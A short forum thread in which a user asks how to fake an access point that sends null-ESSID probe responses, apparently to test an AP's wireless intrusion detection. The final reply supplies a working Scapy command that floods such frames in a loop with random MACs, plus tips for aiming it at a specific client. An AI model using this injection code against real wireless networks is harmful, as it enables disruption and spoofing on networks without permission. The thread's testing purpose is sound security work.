Forum

  • Hi All,

    I am trying to host a FakeAP which sends probe response with Null ESSID or zero length ESSID to all the clients which sends broadcast probe requests on any channel.

    I have tried the following tools with madwifi driver
    airbase-ng
    rfakeap
    rglueap

    All these tools gives an option to set ESSID on the Probe responses but it does not allow to set Null ESSID.

    This is to generate "Null probe response" attack to test WIDS feature on the AP.

    Anyone who has done this attack before, please help me out.

    -Ravi.

  • A probe response frame always contains the SSID... well, it should.

  • By the books it should , but is it possible to create a Probe response with Null SSID ?

  • If you have a coding background, airbase-ng is open-source (not sure about the others). I don't imagine it would be too tough to find the code that restricts NULL SSID in the probe response and modify it.

  • Exactly what kind of effect on clients do you expecting to see ?

    Unless you can change the BSSID along with every Response, something like InSSIDer or Netstumbler is only going to show one entry. Even with different BSSID's, many Windows systems will still only show you one network.

    Is this just an attempt to overflow someones log file? An attempt to force association to a bogus AP/SSID ?

  • Scapy is your friend here..... You can pretty much set any field in the 802.11 frame to whatever you like and inject it.

  • This scapy code below generates lots of Null Probe Responses :-) I have attached the pcap file which shows 4 of these frames that are generated by Scapy using the code below.... Notice the SSID is '0' - AKA a null probe response.

    sendp(RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=RandMAC(),addr3=RandMAC())/Dot11ProbeResp(cap="ESS")/Dot11Elt(ID="SSID", len=0,info="")/Dot11Elt

    (ID="Rates",info='\x82\x84\x0b\x16')/Dot11Elt(ID="DSset",info="\x06")/Dot11Elt(ID="TIM",info="\xFF\xFF\xFF\xFF"),iface="mon0",loop=1)

    Some points to note:

    1. You could/should tweak it so that it 'only' fires when it hears a Probe Request.......
    2. At present, the destination is a broadcast address, you could change it to the unicast MAC address of the client you are targetting....
    3. The TA (Transmitter Address) / SA (Source Address) and BSSID are chosen at random, you can specify MAC addresses of your own choosing here.....
    4. Some of the IE fields I set to random values, feel free to ignore themĀ (i.e. I set the TIM to all F's....)

    Have fun.

    DJ

Page 1 of 1
  • 1